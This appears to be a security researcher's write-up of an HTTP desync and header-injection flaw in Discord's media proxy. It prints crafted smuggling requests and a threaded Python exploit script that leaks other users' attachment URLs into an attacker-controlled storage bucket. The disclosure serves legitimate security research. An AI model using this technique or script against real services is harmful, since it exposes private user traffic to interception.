tmctmt

HTTP desync in Discord's media proxy: Spying on a whole platform

In 2022, I came across a quirky behavior on media.discordapp.net when I miskeyed a space character into an attachment link: a 502 bad gateway.

image

After some fiddling I realized that this was caused by a HTTP injection bug within the media proxy’s request to the upstream GCP bucket. The space character corrupted the proxied HTTP message, which caused the connection to prematurely terminate.

For example, a crafted user request to the media proxy would look like this:

GET /attachments/a%20b HTTP/1.1
Host: media.discordapp.net

And it would trigger an upstream request from the backend like so, which is invalid HTTP:

GET /attachments/a b HTTP/1.1
Host: discord.storage.googleapis.com

The server also happily passed on control characters like line feeds, which made it possible to inject headers and to queue additional requests into the pipeline.

I used this to load in a few images from my bucket by overriding the Host header, which was amusing for about five seconds.

A while later, I realized that the GCP connections were probably being pulled from a shared pool and put back into circulation when the request is processed - which’d make sense logistically, you’d wanna spare users from the extra round-trip that comes with opening connections.

This gave me a wild idea: what if I enqueued a PUT request for my bucket with an oversized Content-Length - would the GCP connection’s next borrower be treated as part of the body and be uploaded into the file?

As it turned out, yes. This is pretty much the premise of a HTTP desync attack.

I sent the following request to the media proxy:

GET /attachments/%20HTTP/1.1%0AHost:x%0A%0APUT%20/request.txt%20HTTP/1.1%0AHost:myevilbucket.storage.googleapis.com%0AContent-Length:250%0A%0A HTTP/1.1
Host: media.discordapp.net

Which caused the backend to send out these two requests to GCP:

GET /attachments/ HTTP/1.1
Host:x
PUT /request.txt HTTP/1.1
Host:myevilbucket.storage.googleapis.com
Content-Length:250

 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.6; rv:92.0) Gecko/20100101 Firefox/92.0
Host: discord.storage.googleapis.com

The PUT request expected 250 bytes of data but only 150 were given, meaning that the deficit would be eaten from whatever gets written to the stream next, i.e., the next borrower’s request.

And sure enough when I checked a few moments later, my request.txt had an attachment link in it I’ve never seen before:

 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.6; rv:92.0) Gecko/20100101 Firefox/92.0
Host: discord.storage.googleapis.com

GET /attachments/10032788*********/101624143721*******/image.jpg HTTP/1.1

This meant that I could snoop in on media.discordapp.net’s global traffic and see all attachments that were being viewed in real-time, regardless of whether they were sent in public servers or private DMs. Scary stuff.

And the process wasn’t hard to scale either, just required threading and more files to fill with incoming requests:

from googleutils import generate_signed_url
from urllib.parse import urlsplit
from threading import Thread
import requests

CONCURRENCY = 10
CONTENT_LENGTH = 250
BUCKET_NAME = 'myevilbucket'

cache = set()

def exfiltrator(read_url, write_url):
    rs = requests.Session()

    exploit_url = (
        'https://media.discordapp.net/attachments/%20HTTP/1.1%0aHost:storage.cloud.google.com%0a%0a'
        f'PUT%20%2F{urlsplit(write_url).path}%3F{write_url[write_url.find('?')+1:].replace('%','%25')}%20HTTP/1.1%0a'
        f'Host:{urlsplit(write_url).hostname}%0a'
        f'Content-Length:{CONTENT_LENGTH}%0a%0a'
    )
    
    while True:
        rs.get(exploit_url)
        request = rs.get(read_url).text
        url = 'https://media.discordapp.net' + request.split('GET ')[1].split(' ')[0]
        if url not in cache:
            cache.add(url)
            print(url)

for num in range(CONCURRENCY):
    path = f'request{num}.txt'
    read_url = generate_signed_url(
        'credentials.json', BUCKET_NAME, path)
    write_url = generate_signed_url(
        'credentials.json', BUCKET_NAME, path,
        http_method='PUT')
    Thread(target=exfiltrator, args=(read_url, write_url)).start()

You’re looking at attachments as they’re being accessed in real time by people around the world. Isn’t that insane??

Definitely one of the coolest and most impactful bugs I’ve found, though I still don’t understand what caused it to this day, since no halfway-decent request library would let you inject control characters into your messages. Perhaps they were working with raw sockets?

Also, in theory it might have been possible to send back spoofed responses to users’ requests, but I never confirmed this.

Timeline

#bugs